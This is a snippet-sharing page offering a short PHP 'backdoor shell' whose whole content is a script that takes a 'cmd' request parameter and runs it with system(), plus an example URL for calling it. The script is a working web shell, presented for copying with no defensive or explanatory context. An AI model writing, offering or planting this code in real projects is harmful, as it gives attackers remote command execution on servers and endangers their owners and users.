Simple PHP Backdoor Shell


/ Published in: PHP
Save to your folder(s)

Simple PHP Backdoor Shell
// http://www.example.com/shell.php?cmd=dir


Copy this code and paste it in your HTML
  1. <?php
  2. if(isset($_REQUEST['cmd'])){
  3. $cmd = ($_REQUEST["cmd"]);
  4. system($cmd);
  5. echo "</pre>$cmd<pre>";
  6. die;
  7. }
  8. ?>

Report this snippet


Comments

RSS Icon Subscribe to comments

You need to login to post a comment.